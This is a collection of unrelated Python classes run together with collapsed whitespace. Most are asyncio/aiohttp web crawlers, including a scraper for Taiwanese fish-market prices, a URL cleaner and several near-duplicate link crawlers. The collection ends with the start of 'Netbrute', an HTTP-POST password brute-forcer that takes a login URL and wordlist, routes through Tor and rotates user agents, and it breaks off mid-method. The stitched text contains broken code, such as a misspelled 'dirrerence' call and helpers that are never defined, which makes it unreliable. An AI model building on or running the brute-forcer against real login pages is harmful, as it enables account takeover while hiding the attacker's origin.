class Crawler: """Crawl the aquatic market data of a specific date interval. """ def __init__(self, start_date, end_date, max_tasks=10, max_tries=10, loop=None): self.start_date = start_date self.end_date = end_date self.max_tasks = max_tasks self.max_tries = max_tries self.loop = loop or asyncio.get_event_loop() self.session = aiohttp.ClientSession(loop=self.loop) self.q = Queue(loop=self.loop) self.t0 = time.time() self.t1 = None self.make_url_queue() def add_url(self, url): self.q.put_nowait(url) def make_url_queue(self): dates = dates_gen_fn(self.start_date, self.end_date) for date in dates: roc_year = int(date.strftime('%Y')) - 1911 query_date = '{:3d}{}'.format(roc_year, date.strftime('%m%d')).replace( ' ', '0') url = BASE_URL.format(query_date, query_date) self.add_url(url) def close(self): self.session.close() @asyncio.coroutine def parse(self, response): # print(response) if response.status == 200: content_type = response.headers.get('content-type') if content_type: content_type, pdict = cgi.parse_header(content_type) if content_type in ('text/html', 'application/xml'): json = yield from response.json(content_type=content_type) if json: # print(len(json)) for item in json: # print(item) type_name = item['魚貨名稱'] type_code = item['品種代碼'] market_name = item['市場名稱'] high_price = item['上價'] low_price = item['下價'] mid_price = item['中價'] avg_price = item['平均價'] date = item['交易日期'] trans_amount = item['交易量'] sql = ''' INSERT INTO {} (type_name, type_code, market_name, high_price, low_price, mid_price, avg_price, date, trans_amount) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)'''.format( DATABASE_TABLE) cur.execute(sql, (type_name, type_code, market_name, high_price, low_price, mid_price, avg_price, date, trans_amount)) conn.commit() return @asyncio.coroutine def fetch(self, url): """Fetch one URL.""" tries = 0 while tries < self.max_tries: try: response = yield from self.session.get(url, allow_redirects=False) if tries > 1: LOGGER.info('try %r for %r success', tries, url) break except aiohttp.ClientError as client_error: LOGGER.info('try %r for %r raised %r', tries, url, client_error) # exception = client_error tries += 1 else: # We never broke out of the loop: all tries failed. return try: yield from self.parse(response) finally: yield from response.release() print('{} done'.format(url)) @asyncio.coroutine def work(self): """Process queue items forever.""" try: while True: url = yield from self.q.get() yield from self.fetch(url) self.q.task_done() except asyncio.CancelledError: pass @asyncio.coroutine def crawl(self): """Run the crawler until all finished.""" workers = [ asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks) ] self.t0 = time.time() yield from self.q.join() self.t1 = time.time() for w in workers: w.cancel() conn.close() dt = self.t1 - self.t0 print('elapsed time: {}'.format(dt))
class URLCleaner: """Preprocess and clean urls.""" def __init__(self, urls, normalizer, result_saver=print, qsize=None, result_qsize=None, num_workers=1, max_tries=4, timeout=3, max_connections=30, *, loop=None): """Async URLCleaner. :param normalizer: callable that takes url and returns normalized url or False when url is invalid or None, when url can't be validated. """ self.urls = urls self.normalizer = normalizer self.result_saver = result_saver self.loop = loop or asyncio.get_event_loop() self.q = Queue(maxsize=qsize or num_workers * 10, loop=self.loop) self.result_q = Queue(maxsize=result_qsize or num_workers * 10, loop=self.loop) self.num_workers = num_workers self.max_tries = max_tries self.timeout = timeout proxy = os.environ.get('http_proxy') if proxy: self.connector = aiohttp.ProxyConnector(proxy=proxy, limit=max_connections, loop=self.loop) else: self.connector = aiohttp.TCPConnector(limit=max_connections, loop=self.loop) self.t0 = time.time() self.t1 = None self.clean_task = None def local_clean(self, url): local_clean_url = self.normalizer(url) if local_clean_url: status = 'LOCAL_OK' elif local_clean_url is False: status = 'LOCAL_INVALID' local_clean_url = None else: status = 'UNCLEANED' return URLStat(url=url, local_clean_url=local_clean_url, remote_clean_url=None, status=status, http_code=None, exception=None) @asyncio.coroutine def remote_clean(self, urlstat): """Check URL by HEAD probing it.""" tries = 0 exception = None url = urlstat.local_clean_url headers = { 'Accept-Encoding': 'identity', } while tries < self.max_tries: try: response = yield from asyncio.wait_for( aiohttp.request('head', url, allow_redirects=True, headers=headers, connector=self.connector, loop=self.loop), self.timeout, loop=self.loop) response.close() if tries > 1: logger.info('Try %r for %r success', tries, url) break except ValueError as error: # do not need to retry for these errors logger.info('For %r raised %s', url, error) tries = self.max_tries exception = error except aiohttp.HttpProcessingError as e: logger.error('Got http error for %r, exception %s', url, e) urlstat.http_code = e.code urlstat.status = 'REMOTE_ERROR' urlstat.exception = e return urlstat except (aiohttp.ClientError, asyncio.TimeoutError) as error: logger.info('Try %r for %r raised %s, %s', tries, url, type(error), error) exception = error tries += 1 yield from asyncio.sleep(0.1) else: # all tries failed logger.error('all tries for %r failed, exception %s', url, exception) urlstat.status = 'REMOTE_ERROR' urlstat.exception = exception return urlstat urlstat.http_code = response.status if response.status == 200: remote_clean_url = self.normalizer(response.url) if remote_clean_url: urlstat.status = 'REMOTE_OK' urlstat.remote_clean_url = remote_clean_url elif remote_clean_url is False: urlstat.status = 'REMOTE_INVALID' else: # url requires authorization, can't clean urlstat.status = 'UNCLEANED' else: urlstat.status = 'REMOTE_INVALID' return urlstat @asyncio.coroutine def process_url(self, url): urlstat = self.local_clean(url) if urlstat.status == 'LOCAL_OK': urlstat = yield from self.remote_clean(urlstat) return urlstat def close(self): """Close resources.""" self.connector.close() @asyncio.coroutine def save_results(self): """Save cleaned URLStat.""" while True: urlstat = yield from self.result_q.get() try: self.result_saver(urlstat) except StopIteration: self.cancel() except Exception as e: # noqa logger.exception(e) self.result_q.task_done() @asyncio.coroutine def work(self): """Process queue items forever.""" while True: url = yield from self.q.get() urlstat = yield from self.process_url(url) self.q.task_done() yield from self.result_q.put(urlstat) @asyncio.coroutine def _clean(self): try: self.consumer = asyncio.Task(self.save_results(), loop=self.loop) self.workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.num_workers)] self.t0 = time.time() for url in self.urls: yield from self.q.put(url) yield from self.q.join() yield from self.result_q.join() self.t1 = time.time() logger.debug('Cleaning time %.2f seconds', self.t1 - self.t0) self.cancel() finally: self.close() def clean(self): """Run the cleaner until all finished.""" self.clean_task = asyncio.async(self._clean(), loop=self.loop) return self.clean_task def cancel(self): self.consumer.cancel() for w in self.workers: w.cancel() self.clean_task.cancel()
class Crawler: """Crawl a set of URLs. This manages two sets of URLs: 'urls' and 'done'. 'urls' is a set of URLs seen, and 'done' is a list of FetchStatistics. """ def __init__( self, roots, exclude=None, strict=True, # What to crawl. max_redirect=10, max_tries=4, # Per-url limits. max_tasks=10, *, loop=None): self.loop = loop or asyncio.get_event_loop() self.roots = roots self.exclude = exclude self.strict = strict self.max_redirect = max_redirect self.max_tries = max_tries self.max_tasks = max_tasks self.q = Queue(loop=self.loop) # url执行队列,使用put将url放入队列供爬虫爬取 self.seen_urls = set() self.done = [] # 完成列表,每个元素是访问url后的具名元组FetchStatistic self.session = aiohttp.ClientSession(loop=self.loop) # 单线程IO操作 self.root_domains = set() for root in roots: parts = urllib.parse.urlparse( root) # return 6 parts includes netloc(host+port) host, port = urllib.parse.splitport( parts.netloc) # www.baidu.com, 80 if not host: continue if re.match(r'\A[\d\.]*\Z', host): # 如果url是全数字 self.root_domains.add(host) else: host = host.lower() if self.strict: self.root_domains.add(host) else: # 省略www. self.root_domains.add(lenient_host(host)) for root in roots: self.add_url(root) # add url to seen_urls set self.t0 = time.time() # bgn time self.t1 = None # end time def close(self): """Close resources.""" self.session.close() def host_okay(self, host): """Check if a host should be crawled. A literal match (after lowercasing) is always good. For hosts that don't look like IP addresses, some approximate matches are okay depending on the strict flag. """ host = host.lower() if host in self.root_domains: return True if re.match(r'\A[\d\.]*\Z', host): return False if self.strict: return self._host_okay_strictish(host) # 带www. else: return self._host_okay_lenient(host) # 不带www. def _host_okay_strictish(self, host): """Check if a host should be crawled, strict-ish version. This checks for equality modulo an initial 'www.' component. """ host = host[4:] if host.startswith('www.') else 'www.' + host return host in self.root_domains def _host_okay_lenient(self, host): """Check if a host should be crawled, lenient version. This compares the last two components of the host. """ return lenient_host(host) in self.root_domains def record_statistic(self, fetch_statistic): """Record the FetchStatistic for completed / failed URL.""" self.done.append(fetch_statistic) @asyncio.coroutine def parse_links(self, response): # 这def里的内容好像和现在主流的网页代码不太match,需要使用,需修改 """Return a FetchStatistic and list of links.""" links = set() content_type = None encoding = None body = yield from response.read() # 返回网页代码的<body>内容 if response.status == 200: content_type = response.headers.get( 'content-type') # 只分析头部有content-type的 pdict = {} if content_type: content_type, pdict = cgi.parse_header(content_type) encoding = pdict.get('charset', 'utf-8') if content_type in ('text/html', 'application/xml'): text = yield from response.text() # Replace href with (?:href|src) to follow image links. urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''', text)) # 在href中找urls if urls: LOGGER.info('got %r distinct urls from %r', len(urls), response.url) for url in urls: normalized = urllib.parse.urljoin(response.url, url) defragmented, frag = urllib.parse.urldefrag(normalized) if self.url_allowed(defragmented): links.add(defragmented) stat = FetchStatistic(url=response.url, next_url=None, status=response.status, exception=None, size=len(body), content_type=content_type, encoding=encoding, num_urls=len(links), num_new_urls=len(links - self.seen_urls)) return stat, links @asyncio.coroutine def fetch(self, url, max_redirect): """Fetch one URL.""" tries = 0 exception = None while tries < self.max_tries: try: response = yield from self.session.get(url, allow_redirects=False) # session是个单线程IO操作,访问url,返回response。结合@asyncio.coroutine达成多线程异步IO操作 if tries > 1: LOGGER.info('try %r for %r success', tries, url) break except aiohttp.ClientError as client_error: LOGGER.info('try %r for %r raised %r', tries, url, client_error) exception = client_error tries += 1 else: # We never broke out of the loop: all tries failed. LOGGER.error('%r failed after %r tries', url, self.max_tries) self.record_statistic( FetchStatistic(url=url, next_url=None, status=None, exception=exception, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) return try: if is_redirect(response): location = response.headers['location'] next_url = urllib.parse.urljoin(url, location) # 是跳转下级连接,需要拼接出完整连接 self.record_statistic( FetchStatistic(url=url, next_url=next_url, status=response.status, exception=None, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) if next_url in self.seen_urls: return if max_redirect > 0: LOGGER.info('redirect to %r from %r', next_url, url) self.add_url(next_url, max_redirect - 1) else: LOGGER.error('redirect limit reached for %r from %r', next_url, url) else: # 不是跳转下级,是完整link,则需要分析link,即下一环的协程工作 stat, links = yield from self.parse_links( response) # 提取并分析link self.record_statistic(stat) for link in links.difference( self.seen_urls): # 在links里,但不在seen_urls里 self.q.put_nowait((link, self.max_redirect)) # 放入执行队列 self.seen_urls.update(links) finally: yield from response.release() @asyncio.coroutine def work(self): """Process queue items forever.""" try: while True: url, max_redirect = yield from self.q.get() assert url in self.seen_urls # 如果url不在seen_urls里,则跳进except yield from self.fetch(url, max_redirect) self.q.task_done() except asyncio.CancelledError: pass def url_allowed(self, url): if self.exclude and re.search(self.exclude, url): return False parts = urllib.parse.urlparse(url) if parts.scheme not in ('http', 'https'): # 过滤非法url LOGGER.debug('skipping non-http scheme in %r', url) return False host, port = urllib.parse.splitport(parts.netloc) if not self.host_okay( host): # 过滤那些root url不在roots列表里的,roots列表见crawl.py LOGGER.debug('skipping non-root host in %r', url) return False return True def add_url(self, url, max_redirect=None): """Add a URL to the queue if not seen before.""" if max_redirect is None: max_redirect = self.max_redirect LOGGER.debug('adding %r %r', url, max_redirect) self.seen_urls.add(url) self.q.put_nowait((url, max_redirect)) @asyncio.coroutine # 异步协程:爬取执行到yield from时并不会停止等待,而是立刻执行loop中的下一个爬取crawl函数 def crawl(self): """Run the crawler until all finished.""" workers = [ asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks) ] # 创建100个workers的list,其中每个work就是一个task(thread) self.t0 = time.time() yield from self.q.join() # 等待所有线程worker完成工作 # yield from 解释见: https://www.cnblogs.com/wongbingming/p/9085268.html # 每个耗时的动作都编写一个@asyncio.coroutine下的def,然后在这个def内用yield from连接另外一个耗时的同candy的def self.t1 = time.time() for w in workers: w.cancel() # cancel this task
class Crawler: """Crawl a set of URLs. This manages two sets of URLs: 'urls' and 'done'. 'urls' is a set of URLs seen, and 'done' is a list of FetchStatistics. """ def __init__(self, roots, # What to crawl. exclude=None, include=None, output=None, strict=True, count=None, proxy=None, max_redirect=10, max_tries=4, # Per-url limits. max_tasks=10, loop=None, no_parse_links=False): self.loop = loop or asyncio.get_event_loop() self.roots = roots self.exclude = exclude self.include = include self.output = output self.count = int(count) if count else None self.strict = strict self.proxy = proxy self.max_redirect = max_redirect self.max_tries = max_tries self.max_tasks = max_tasks self.task_exit_counter = 0 self.q = Queue(loop=self.loop) self.seen_urls = set() self.done = [] self.session = aiohttp.ClientSession(loop=self.loop) self.root_domains = set() self.no_parse_links = no_parse_links for root in roots: parts = urllib.parse.urlparse(root) host, port = urllib.parse.splitport(parts.netloc) if not host: continue if re.match(r'\A[\d\.]*\Z', host): self.root_domains.add(host) else: host = host.lower() if self.strict: self.root_domains.add(host) else: self.root_domains.add(lenient_host(host)) for root in roots: self.add_url(root) self.t0 = time.time() self.t1 = None self.output_file = self.get_file() @asyncio.coroutine def close(self): """Close resources.""" yield from self.session.close() def host_okay(self, host): """Check if a host should be crawled. A literal match (after lowercasing) is always good. For hosts that don't look like IP addresses, some approximate matches are okay depending on the strict flag. """ host = host.lower() if host in self.root_domains: return True if re.match(r'\A[\d\.]*\Z', host): return False if self.strict: return self._host_okay_strictish(host) else: return self._host_okay_lenient(host) def _host_okay_strictish(self, host): """Check if a host should be crawled, strict-ish version. This checks for equality modulo an initial 'www.' component. """ host = host[4:] if host.startswith('www.') else 'www.' + host return host in self.root_domains def _host_okay_lenient(self, host): """Check if a host should be crawled, lenient version. This compares the last two components of the host. """ return lenient_host(host) in self.root_domains def record_statistic(self, fetch_statistic): """Record the FetchStatistic for completed / failed URL.""" self.done.append(fetch_statistic) def parse_text(self, url, text): ''' call callback func on route ''' route, args = router.match(url) if route: route.call(text, **args) @asyncio.coroutine def parse_links(self, response): """Return a FetchStatistic and list of links.""" links = set() content_type = None encoding = None body = yield from response.read() if response.status == 200: content_type = response.headers.get('content-type') pdict = {} if content_type: content_type, pdict = cgi.parse_header(content_type) encoding = pdict.get('charset', 'utf-8') if content_type in ('text/html', 'application/xml'): text = yield from response.text(errors='ignore') # Replace href with (?:href|src) to follow image links. urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''', text)) if urls: logger.debug('got %r distinct urls from %r', len(urls), response.url) for url in urls: normalized = urllib.parse.urljoin(str(response.url), url) defragmented, frag = urllib.parse.urldefrag(normalized) if self.url_allowed(defragmented): links.add(defragmented) # parse text self.parse_text(str(response.url), text) # do outing self.handle_output(str(response.url), text) stat = FetchStatistic( url=response.url, next_url=None, status=response.status, exception=None, size=len(body), content_type=content_type, encoding=encoding, num_urls=len(links), num_new_urls=len(links - self.seen_urls)) return stat, links def handle_output(self, url, text): if self.output: d = self.parse_output(url, text) logger.info(f'write item: {url}') outputing.do_write(self.output, d, self.output_file) def parse_output(self, url, text): html = HTML(html=text) title_ele = html.find('title', first=True) d = OrderedDict() d['title'] = title_ele.text d['url'] = url d['datetime'] = now_time() d['text'] = text return d def get_file(self): ''' generate a file name for output ''' domains = list(self.root_domains) dt = datetime.datetime.now() dt_str = dt.strftime('%Y-%m-%d %H:%M:%S') f_name = f'{domains[0]}-{dt_str}' if self.output: if self.output == 'stream': return None f_name += f'.{self.output}' return f_name @asyncio.coroutine def fetch(self, url, max_redirect): """Fetch one URL.""" tries = 0 exception = None while tries < self.max_tries: try: response = yield from self.session.get( url, allow_redirects=False, proxy=self.proxy) if tries > 1: logger.info('try %r for %r success', tries, url) break except aiohttp.ClientError as client_error: logger.info('try %r for %r raised %r', tries, url, client_error) exception = client_error tries += 1 else: # We never broke out of the loop: all tries failed. logger.error('%r failed after %r tries', url, self.max_tries) self.record_statistic(FetchStatistic(url=url, next_url=None, status=None, exception=exception, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) return try: if is_redirect(response): location = response.headers['location'] next_url = urllib.parse.urljoin(url, location) self.record_statistic(FetchStatistic(url=url, next_url=next_url, status=response.status, exception=None, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) if next_url in self.seen_urls: return if max_redirect > 0: logger.info('redirect to %r from %r', next_url, url) self.add_url(next_url, max_redirect - 1) else: logger.error('redirect limit reached for %r from %r', next_url, url) else: stat, links = yield from self.parse_links(response) self.record_statistic(stat) # disable parse links if not self.no_parse_links: for link in links.difference(self.seen_urls): # use router to verify links if self.verify_url(link) or router.verify_url(link, url): self.q.put_nowait((link, self.max_redirect)) self.seen_urls.update(links) except Exception as ex: logger.error(f'parse error: {url}') logger.exception(ex) finally: yield from asyncio.sleep(1) yield from response.release() @asyncio.coroutine def exit_on_empty_queue(self): if self.count and len(self.done) >= self.count: logger.warning(f'reach count: {self.count}, now quit') router.stop() if self.q.qsize() == 0: logger.warning('empty queue, now quit') yield from self.q.join() router.stop() @asyncio.coroutine def work(self): """Process queue items forever.""" try: while router.is_running(): url, max_redirect = yield from self.q.get() logger.debug(f'work on url {url}') assert url in self.seen_urls yield from self.fetch(url, max_redirect) self.q.task_done() yield from self.exit_on_empty_queue() except asyncio.CancelledError: logger.warning('canceling the worker') def url_allowed(self, url): parts = urllib.parse.urlparse(url) if parts.scheme not in ('http', 'https'): # logger.debug('skipping non-http scheme in %r', url) return False host, port = urllib.parse.splitport(parts.netloc) if not self.host_okay(host): # logger.debug('skipping non-root host in %r', url) return False return True def verify_url(self, url): if self.include: for pattern in self.include: if re.search(pattern, url): logger.debug( f'{url} match include pattern: {pattern}, allowed') return True if self.exclude and re.search(self.exclude, url): logger.debug( f'{url} match exclude pattern: {self.exclude}, rejected') return False # default False return False def add_url(self, url, max_redirect=None): """Add a URL to the queue if not seen before.""" if max_redirect is None: max_redirect = self.max_redirect logger.debug('adding %r %r', url, max_redirect) self.seen_urls.add(url) self.q.put_nowait((url, max_redirect)) @asyncio.coroutine def crawl(self): """Run the crawler until all finished.""" try: workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks)] self.t0 = time.time() # yield from asyncio.gather(*workers, loop=self.loop, return_exceptions=True) yield from router.quit_event.wait() for w in workers: w.cancel() self.t1 = time.time() except asyncio.CancelledError: logger.warning('canceling the crawler') finally: logger.warning('closing the crawler') yield from self.close()
class Crawler: def __init__(self, root_url: str, max_redirect: int): self.max_tasks = 10 self.max_redirect = max_redirect self.q = Queue() self.seen_urls = set() # aiohttp 的 ClientSession 执行连接池 并且 HTTP 为我们 keep-alive self.session = aiohttp.ClientSession(loop=loop) # 把 (URL, max_redirect) 放入队列 self.q.put((root_url, self.max_redirect)) @asyncio.coroutine def crawl(self): """运行 crawler 直到所有的工作完成""" wokers = [asyncio.Task(self.work()) for _ in range(self.max_tasks)] # 当所有任务完成,退出 yield from self.q.join() for w in wokers: w.cancel() @asyncio.coroutine def work(self): while True: url, max_redirect = yield from self.q.get() # 下载页面并向 self.q 中增加新链接 yield from self.fetch(url, max_redirect) self.q.task_done() @asyncio.coroutine def fetch(self, url: str, max_redirect: int): # 我们自己处理 redirects response = yield from self.session.get( url, allow_redirects=False ) try: if is_redirect(response): if max_redirect > 0: next_url = response.headers['location'] if next_url in self.seen_urls: # 我们已经下载过这个路径 return # 记录我们已经看过这条连接 self.seen_urls.add(next_url) # 跟进重定向,重定向次数减一 self.q.put_nowait((next_url, max_redirect - 1)) else: links = yield from self.parse_links(response) # python集合逻辑 for link in links.dirrerence(self.seen_urls): self.q.put_nowait((link, self.max_redirect)) self.seen_urls.update(links) finally: # 返回连接池 yield from response.release()
class Spider: def __init__(self, max_tries=30, max_tasks=10, timeout=5, rootDir=os.getcwd()): self.max_tries = max_tries self.max_tasks = max_tasks self.loop = asyncio.get_event_loop() self.q = Queue(loop=self.loop) self.session = aiohttp.ClientSession(loop=self.loop) self.timeout = timeout self.rootDir = rootDir def close(self): self.session.close() def append_request(self, request): self.q.put_nowait(request) @asyncio.coroutine def _get_request(self): r = yield from self.q.get() return r @asyncio.coroutine def fetch(self, request_type, url, params, data): """Fetch one URL""" tries = 0 exception = None while tries < self.max_tries: try: print("try %s---->%d times" % (url, tries)) with aiohttp.Timeout(self.timeout): response = yield from self.session.get(url, params=params) if response.status == 200: content_type = response.headers.get('content-type') if content_type in CONTENT_TYPE_TEXT: with aiohttp.Timeout(self.timeout): content = yield from response.text( encoding='GBK') else: with aiohttp.Timeout(self.timeout): content = yield from response.read() break except asyncio.TimeoutError: print("timeout") except aiohttp.ClientError as client_error: print("client error") except Exception: print("unknown error") tries += 1 else: print("try %s---->more than %d times, quit" % (url, tries)) return None response.release() return content @asyncio.coroutine def _work(self): """Process queue items forever.""" try: while True: r = yield from self._get_request() content = yield from self.fetch(r.request_type, r.url, r.params, r.data) if (content): r.handle_func(content) self.q.task_done() except asyncio.CancelledError: pass @asyncio.coroutine def work(self): yield from self._work() @asyncio.coroutine def spider(self): """run the spider until all finished""" workers = [ asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks) ] yield from self.q.join() for w in workers: w.cancel()
class Crawler: def __init__(self, root, max_tasks=1000, loop=None, file=None): LOGGER.info('Starting Crawler ...\n') self.loop = loop or asyncio.get_event_loop() self.q = Queue(loop=self.loop) self.visited_urls = set() self.max_tasks = max_tasks self.session = aiohttp.ClientSession(loop=self.loop) self.root_domains = set() parts = urllib.parse.urlparse(root) host, port = urllib.parse.splitport(parts.netloc) if re.match(r'\A[\d\.]*\Z', host): self.root_domains.add(host) else: host = host.lower() self.root_domains.add(host) print('Hosts : {}'.format(','.join(self.root_domains))) self.add_url(root) self.t0 = time.time() self.t1 = None filename = '{}.csv'.format(file) self.f = open(filename, 'w') self.csv = csv.writer(self.f) self.csv.writerow(CSV_HEADER) def add_url(self, url): LOGGER.debug('adding %r', url) self.visited_urls.add(url) self.q.put_nowait(url) def close(self): self.session.close() self.f.close() def host_okay(self, host): host = host.lower() if host in self.root_domains: return True if re.match(r'\A[\d\.]*\Z', host): return False return self._host_okay_strict(host) def _host_okay_strict(self, host): host = host[4:] if host.startswith('www.') else 'www.' + host return host in self.root_domains def url_allowed(self, url): parts = urllib.parse.urlparse(url) if parts.scheme not in ('http', 'https'): LOGGER.debug('skipping non-http scheme in %r', url) return False host, port = urllib.parse.splitport(parts.netloc) if not self.host_okay(host): LOGGER.debug('skipping non-root host in %r', url) return False return True @asyncio.coroutine def parse_response(self, response): links = set() if response.status == 200: content_type = response.headers.get('content-type') if content_type: content_type, pdict = cgi.parse_header(content_type) if content_type in ('text/html', 'application/xml'): text = yield from response.text() urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''', text)) if urls: LOGGER.info('got %r distinct urls from %r', len(urls), response.url) for url in urls: normalized = urllib.parse.urljoin(response.url, url) defragmented, frag = urllib.parse.urldefrag(normalized) if self.url_allowed(defragmented): links.add(defragmented) if links: LOGGER.info('got %r distinct urls from %r', len(links), response.url) for link in links.difference(self.visited_urls): self.q.put_nowait(link) self.visited_urls.update(links) return links @asyncio.coroutine def fetch(self, url): try: response = yield from self.session.get(url, allow_redirects=False) self.csv.writerow([url, response.status]) if is_redirect(response): location = response.headers['location'] next_url = urllib.parse.urljoin(url, location) if next_url in self.visited_urls: return else: self.add_url(next_url) else: links = yield from self.parse_response(response) for link in links.difference(self.visited_urls): self.q.put_nowait(link) self.visited_urls.update(links) yield from response.release() except aiohttp.ClientError as client_error: LOGGER.info('try for %r raised %r', url, client_error) @asyncio.coroutine def work(self): try: while True: url = yield from self.q.get() assert url in self.visited_urls yield from self.fetch(url) self.q.task_done() except asyncio.CancelledError: pass @asyncio.coroutine def crawl(self): workers = [ asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks) ] self.t0 = time.time() yield from self.q.join() self.t1 = time.time() for w in workers: w.cancel()
class Crawler: """Crawl a set of URLs. This manages two sets of URLs: 'urls' and 'done'. 'urls' is a set of URLs seen, and 'done' is a list of FetchStatistics. 这里面有两个队列.seen_urls 和 done """ # TODO xpath support # TODO uvloop support def __init__(self, roots, exclude=None, strict=True, # What to crawl. max_redirect=10, max_tries=4, # Per-url limits. max_tasks=10, *, loop=None): self.loop = loop or asyncio.get_event_loop() self.roots = roots self.exclude = exclude self.strict = strict self.max_redirect = max_redirect self.max_tries = max_tries self.max_tasks = max_tasks self.q = Queue(loop=self.loop) self.seen_urls = set() self.done = [] self.session = aiohttp.ClientSession(loop=self.loop) self.root_domains = set() for root in roots: parts = urllib.parse.urlparse(root) host, port = urllib.parse.splitport(parts.netloc) if not host: continue if re.match(r'\A[\d\.]*\Z', host): self.root_domains.add(host) else: host = host.lower() if self.strict: self.root_domains.add(host) else: self.root_domains.add(lenient_host(host)) for root in roots: self.add_url(root) self.t0 = time.time() self.t1 = None def close(self): """Close resources.""" self.session.close() def host_okay(self, host): """Check if a host should be crawled. A literal match (after lowercasing) is always good. For hosts that don't look like IP addresses, some approximate matches are okay depending on the strict flag. """ host = host.lower() if host in self.root_domains: return True if re.match(r'\A[\d\.]*\Z', host): return False if self.strict: return self._host_okay_strictish(host) else: return self._host_okay_lenient(host) def _host_okay_strictish(self, host): """Check if a host should be crawled, strict-ish version. This checks for equality modulo an initial 'www.' component. """ host = host[4:] if host.startswith('www.') else 'www.' + host return host in self.root_domains def _host_okay_lenient(self, host): """Check if a host should be crawled, lenient version. This compares the last two components of the host. """ return lenient_host(host) in self.root_domains def record_statistic(self, fetch_statistic): """Record the FetchStatistic for completed / failed URL.""" self.done.append(fetch_statistic) @asyncio.coroutine def parse_links(self, response): """Return a FetchStatistic and list of links.""" links = set() content_type = None encoding = None body = yield from response.read() if response.status == 200: content_type = response.headers.get('content-type') pdict = {} if content_type: content_type, pdict = cgi.parse_header(content_type) encoding = pdict.get('charset', 'utf-8') if content_type in ('text/html', 'application/xml'): text = yield from response.text() # Replace href with (?:href|src) to follow image links. urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''', text)) if urls: LOGGER.info('got %r distinct urls from %r', len(urls), response.url) for url in urls: normalized = urllib.parse.urljoin(response.url, url) defragmented, frag = urllib.parse.urldefrag(normalized) if self.url_allowed(defragmented): links.add(defragmented) stat = FetchStatistic( url=response.url, next_url=None, status=response.status, exception=None, size=len(body), content_type=content_type, encoding=encoding, num_urls=len(links), num_new_urls=len(links - self.seen_urls)) return stat, links @asyncio.coroutine def fetch(self, url, max_redirect): """Fetch one URL.""" tries = 0 exception = None while tries < self.max_tries: try: response = yield from self.session.get( url, allow_redirects=False) if tries > 1: LOGGER.info('try %r for %r success', tries, url) break except aiohttp.ClientError as client_error: LOGGER.info('try %r for %r raised %r', tries, url, client_error) exception = client_error tries += 1 else: # We never broke out of the loop: all tries failed. LOGGER.error('%r failed after %r tries', url, self.max_tries) self.record_statistic(FetchStatistic(url=url, next_url=None, status=None, exception=exception, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) return try: if is_redirect(response): location = response.headers['location'] next_url = urllib.parse.urljoin(url, location) self.record_statistic(FetchStatistic(url=url, next_url=next_url, status=response.status, exception=None, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) if next_url in self.seen_urls: return if max_redirect > 0: LOGGER.info('redirect to %r from %r', next_url, url) self.add_url(next_url, max_redirect - 1) else: LOGGER.error('redirect limit reached for %r from %r', next_url, url) else: stat, links = yield from self.parse_links(response) self.record_statistic(stat) for link in links.difference(self.seen_urls): self.q.put_nowait((link, self.max_redirect)) self.seen_urls.update(links) finally: yield from response.release() @asyncio.coroutine def work(self): """Process queue items forever.""" try: while True: url, max_redirect = yield from self.q.get() assert url in self.seen_urls yield from self.fetch(url, max_redirect) self.q.task_done() except asyncio.CancelledError: pass def url_allowed(self, url): if self.exclude and re.search(self.exclude, url): return False parts = urllib.parse.urlparse(url) if parts.scheme not in ('http', 'https'): LOGGER.debug('skipping non-http scheme in %r', url) return False host, port = urllib.parse.splitport(parts.netloc) if not self.host_okay(host): LOGGER.debug('skipping non-root host in %r', url) return False return True def add_url(self, url, max_redirect=None): """Add a URL to the queue if not seen before.""" if max_redirect is None: max_redirect = self.max_redirect LOGGER.debug('adding %r %r', url, max_redirect) self.seen_urls.add(url) self.q.put_nowait((url, max_redirect)) @asyncio.coroutine def crawl(self): """Run the crawler until all finished.""" workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks)] self.t0 = time.time() yield from self.q.join() self.t1 = time.time() for w in workers: w.cancel()
class Netbrute: """ HTTP-POST BruteForcer """ def __init__(self, loop, pre_url=None, pre_payload=None, target_url=None, login=None, payload_model=None, wordlist=None, error_string=None, tasks=64, tor=None, tor_address=None, debug=None): self.max_tasks = tasks self.queue = Queue() self.pre_url = pre_url self.pre_payload = self._generate_payload_type(pre_payload) self.attack_url = target_url self.login = login self.error_string = [x.strip() for x in error_string.split(',')] self.payload = self._generate_payload_type(payload_model) self.wordlist = wordlist self.found = Event() self.tor_use = tor #self.session = self._generate_new_session(loop) self.debug = debug self.runned_passwords = set() self.old_passwds = set() self.restore_files = [] self.progress_bar = None self.ua = self._prepare_user_agents() self.start_time = time.time() self.last_report_time = time.time() # Statuses set of settings self.loaded_passwords = 0 self.tried_passwords = 0 self.error_passwords = 0 self.max_passwords = 0 # Tor set of settings if self.tor_use is not None and tor_address is not None: ip, port = parse_proxy_address(tor_address) self.tor_address = "http://{0}:{1}".format(ip, port) self.tor_address_string = tor_address # Session set of settings self.session_name = self._generate_session_name() restore_files = self._search_open_sesssion() if restore_files > 0: for file in self.restore_files: if self._load_old_session(file) is True: break else: pass @staticmethod def _prepare_user_agents(): # Load user agents ua = get_user_agents() if not ua: raise Exception("No user agents available") return ua def _load_old_session(self, fn): """ Function to ask user input and decide to use or not to use restore files. This also decompress (if it can) and reads data, storing it inside the main object. :param fn: String => Filename :return: Boolean """ question = input("\n[*] Do you want to load passwords from file '{0}'? [y/N] ".format(os.path.basename(fn))) if question.upper() == "Y": try: # Decompress the data and store it raw with gzip.open(fn, "rb", compresslevel=9) as f: _data = f.read() with open(fn, "wb") as f: f.write(_data) except: # If decompression fails, probably it is not compressed. # So we will 